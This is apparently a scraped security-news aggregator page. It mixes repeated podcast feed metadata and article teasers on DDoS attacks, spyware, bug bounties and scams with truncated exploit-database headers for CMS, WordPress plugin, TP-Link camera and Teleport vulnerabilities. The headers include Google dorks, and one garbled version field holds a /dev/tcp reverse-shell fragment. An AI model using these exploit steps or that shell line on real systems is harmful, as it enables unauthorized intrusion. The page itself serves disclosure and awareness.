During our daily threat hunting activities in our 4000+ customer base, we have gained an intimate understanding of the adversaries behind the threats. This unique insight has been organized by our hunters and security researchers to create threat activity clusters. By clustering these adversaries, we know how to better mitigate the threat they present. Activity clusters …
Paul’s Security Weekly Fri, 13 Jan 2023 19:59:00 +0000 Fri, 13 Jan 2023 22:52:52 +0000 Libsyn WebEngine 2.0 http://securityweekly.com/ en http://securityweekly.com/ sw_production@cyberriskalliance.com (sw_production@cyberriskalliance.com) https://ssl-static.libsyn.com/p/assets/2/3/1/7/231716b9da792464/PSW_1400x1400.png Paul’s Security Weekly Security Weekly hacking,security false sw_production@cyberriskalliance.com episodic no SWN #241 – Credential Stuffing, Bionic Cockroaches, ICS, Magento, & SIM Swap Mobsters – Wrap Up Fri, 23 Sep 2022 18:07:38 …
Paul’s Security Weekly Fri, 13 Jan 2023 19:59:00 +0000 Fri, 13 Jan 2023 22:52:52 +0000 Libsyn WebEngine 2.0 http://securityweekly.com/ en http://securityweekly.com/ sw_production@cyberriskalliance.com (sw_production@cyberriskalliance.com) https://ssl-static.libsyn.com/p/assets/2/3/1/7/231716b9da792464/PSW_1400x1400.png Paul’s Security Weekly Security Weekly hacking,security false sw_production@cyberriskalliance.com episodic no SWN #241 – Credential Stuffing, Bionic Cockroaches, ICS, Magento, & SIM Swap Mobsters – Wrap Up Fri, 23 Sep 2022 18:07:38 …
Paul’s Security Weekly Fri, 13 Jan 2023 19:59:00 +0000 Fri, 13 Jan 2023 22:52:52 +0000 Libsyn WebEngine 2.0 http://securityweekly.com/ en http://securityweekly.com/ sw_production@cyberriskalliance.com (sw_production@cyberriskalliance.com) https://ssl-static.libsyn.com/p/assets/2/3/1/7/231716b9da792464/PSW_1400x1400.png Paul’s Security Weekly Security Weekly hacking,security false sw_production@cyberriskalliance.com episodic no SWN #241 – Credential Stuffing, Bionic Cockroaches, ICS, Magento, & SIM Swap Mobsters – Wrap Up Fri, 23 Sep 2022 18:07:38 …
Paul’s Security Weekly Fri, 13 Jan 2023 19:59:00 +0000 Fri, 13 Jan 2023 22:52:50 +0000 Libsyn WebEngine 2.0 http://securityweekly.com/ en http://securityweekly.com/ sw_production@cyberriskalliance.com (sw_production@cyberriskalliance.com) https://ssl-static.libsyn.com/p/assets/2/3/1/7/231716b9da792464/PSW_1400x1400.png Paul’s Security Weekly Security Weekly hacking,security false sw_production@cyberriskalliance.com episodic no ESW #289 – Jonathan Roizin Fri, 23 Sep 2022 17:55:50 +0000 02:17:46 false Podcast full Read more
Paul’s Security Weekly Fri, 13 Jan 2023 19:59:00 +0000 Fri, 13 Jan 2023 22:52:50 +0000 Libsyn WebEngine 2.0 http://securityweekly.com/ en http://securityweekly.com/ sw_production@cyberriskalliance.com (sw_production@cyberriskalliance.com) https://ssl-static.libsyn.com/p/assets/2/3/1/7/231716b9da792464/PSW_1400x1400.png Paul’s Security Weekly Security Weekly hacking,security false sw_production@cyberriskalliance.com episodic no ESW #289 – Jonathan Roizin Fri, 23 Sep 2022 17:55:50 +0000 02:17:46 false Podcast full Read more
Paul’s Security Weekly Fri, 13 Jan 2023 19:59:00 +0000 Fri, 13 Jan 2023 22:52:50 +0000 Libsyn WebEngine 2.0 http://securityweekly.com/ en http://securityweekly.com/ sw_production@cyberriskalliance.com (sw_production@cyberriskalliance.com) https://ssl-static.libsyn.com/p/assets/2/3/1/7/231716b9da792464/PSW_1400x1400.png Paul’s Security Weekly Security Weekly hacking,security false sw_production@cyberriskalliance.com episodic no ESW #289 – Jonathan Roizin Fri, 23 Sep 2022 17:55:50 +0000 02:17:46 false Podcast full Read more
Are you a veteran hacker, someone who loves code review, or looking to get your first CVE? Then, I have something to share with you. Let’s talk about the Internet Bug Bounty (IBB). Wide Open Source As hackers, it pays to think outside of the box. You don’t just look at what’s in front of …
Are you a veteran hacker, someone who loves code review, or looking to get your first CVE? Then, I have something to share with you. Let’s talk about the Internet Bug Bounty (IBB). Wide Open Source As hackers, it pays to think outside of the box. You don’t just look at what’s in front of …
Are you a veteran hacker, someone who loves code review, or looking to get your first CVE? Then, I have something to share with you. Let’s talk about the Internet Bug Bounty (IBB). Wide Open Source As hackers, it pays to think outside of the box. You don’t just look at what’s in front of …
Are you a veteran hacker, someone who loves code review, or looking to get your first CVE? Then, I have something to share with you. Let’s talk about the Internet Bug Bounty (IBB). Wide Open Source As hackers, it pays to think outside of the box. You don’t just look at what’s in front of …
As a leader in helping secure the cloud across common-use cases, Alert Logic delivers 24/7 monitoring and threat management, simplified visibility, configuration best practices, compliance, integrated threat intelligence, and automation via native integration delivered as a managed service. If you’re using Amazon Web Services, having Alert Logic’s Managed Detection and Response (MDR) help ensure your …
Integrating Alert Logic with Amazon Web Services Read More »
On September 6, bots were set on the services of Gazprombank. As a result of a DDoS attack, the company’s website, call centre and SMS provider were affected. The information security department of Gazprombank complains that the security forces do not help businesses in the cyber war. “Gone are the days when the threat model …
Gazprombank complained about a powerful DDoS attack Read More »
Researchers: Nico Agnese, Vikas Parthasarathy, Joao Santos, Adam Sell, Inna VasilyevaRead more
Microsoft warns about Android spy stealing 2FA codes Microsoft spoke about dangerous spyware that attacks users of mobile devices on Android. According to experts, the authors of the malware disguised it as software for rewarding credit cards. Apparently, Microsoft is describing a new version of the malware that Cyble experts warned about at the end …
Microsoft warns about Android spy stealing 2FA codes Read More »
The Common Criteria (CC) is an international program in which accredited laboratories test IT products against cyber security specifications for technology classes. Under the Common Criteria Recognition Arrangement (CCRA), all member countries agree to recognize each other’s Common Criteria certificates, which allows developers to access the global marketplace regardless of where their product is certified. …
The Common Criteria (CC) is an international program in which accredited laboratories test IT products against cyber security specifications for technology classes. Under the Common Criteria Recognition Arrangement (CCRA), all member countries agree to recognize each other’s Common Criteria certificates, which allows developers to access the global marketplace regardless of where their product is certified. …
When it comes to passwords, most of us would love nothing more than to set it and forget it. But that’s exactly what hackers are hoping for — in fact, it makes their job a lot easier. This means the best line of defense is frequent password changes. But how often should you create new …
An old banking scam has a new look. And it’s making the rounds again. Recently Bank of America alerted its customers of the “Pay Yourself Scam,” where scammers use phony fraud alerts and trick their victims into giving them access to their online banking accounts. It’s a form of phishing attack, and according to Bank …
Steer Clear of the “Pay Yourself Scam” That’s Targeting Online Bank Accounts Read More »
A new data breach or cyber attack is reported almost every single week nowadays. Take a look at this exhaustive list of cyber-attacks in August 2022, for example. There is really not much you can do if a large corporation, which you interact with regularly, gets attacked and your personal information, passwords, or images are …
# Exploit Title: Feehi CMS 2.1.1 – Remote Code Execution (RCE) (Authenticated) # Date: 22-08-2022 # Exploit Author: yuyudhn # Vendor Homepage: https://feehi.com/ # Software Link: https://github.com/liufee/cms # Version: 2.1.1 (REQUIRED) # Tested on: Linux, Docker # CVE : CVE-2022-34140 # Proof of Concept: 1. Login using admin account at http://feehi-cms.local/admin 2. Go to Ad …
[webapps] Feehi CMS 2.1.1 – Remote Code Execution (Authenticated) Read More »
# Exploit Title: WordPress Plugin WP-UserOnline 2.88.0 – Stored Cross Site Scripting (XSS) # Google Dork: inurl:/wp-content/plugins/wp-useronline/ # Date: 2022-08-24 # Exploit Author: UnD3sc0n0c1d0 # Vendor Homepage: https://github.com/lesterchan/wp-useronline # Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip # Category: Web Application # Version: 2.88.0 # Tested on: Debian / WordPress 6.0.1 # CVE : CVE-2022-2941 # Reference: https://github.com/lesterchan/wp-useronline/commit/59c76b20e4e27489f93dee4ef1254d6204e08b3c # 1. …
[webapps] WordPress Plugin WP-UserOnline 2.88.0 – Stored Cross Site Scripting (XSS) Read More »
# Exploit Title: WordPress Plugin 3dady real-time web stats 1.0 – Stored Cross Site Scripting (XSS) # Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/ # Date: 2022-08-24 # Exploit Author: UnD3sc0n0c1d0 # Vendor Homepage: https://profiles.wordpress.org/3dady/ # Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip # Category: Web Application # Version: 1.0 # Tested on: Debian / WordPress 6.0.1 # CVE : N/A # 1. …
# Title: Aero CMS v0.0.1 – SQLi # Author: nu11secur1ty # Date: 08.27.2022 # Vendor: https://github.com/MegaTKC # Software: https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1 # Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi # Description: The `author` parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use …
# Exploit Title: Testa 3.5.1 Online Test Management System – Reflected Cross-Site Scripting (XSS) # Date: 28/08/2022 # Exploit Author: Ashkan Moghaddas # Vendor Homepage: https://testa.cc # Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip # Version: 3.5.1 # Tested on: Windows/Linux # Proof of Concept: # 1- Install Testa 3.5.1 # 2- Go to https://localhost.com/login.php?redirect=XXXX # 3- Add payload …
# Exploit Title: TP-Link Tapo c200 1.1.15 – Remote Code Execution (RCE) # Date: 02/11/2022 # Exploit Author: hacefresko # Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/ # Version: 1.1.15 and below # Tested on: 1.1.11, 1.1.14 and 1.1.15 # CVE : CVE-2021-4045 # Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce import requests, urllib3, sys, threading, os urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) PORT = …
[webapps] TP-Link Tapo c200 1.1.15 – Remote Code Execution (RCE) Read More »
# Exploit Title: Teleport v10.1.1 – Remote Code Execution (RCE) # Date: 08/01/2022 # Exploit Author: Brandon Roach & Brian Landrum # Vendor Homepage: https://goteleport.com # Software Link: https://github.com/gravitational/teleport # Version: /dev/tcp/10.0.0.1/5555 0&1 # Read more
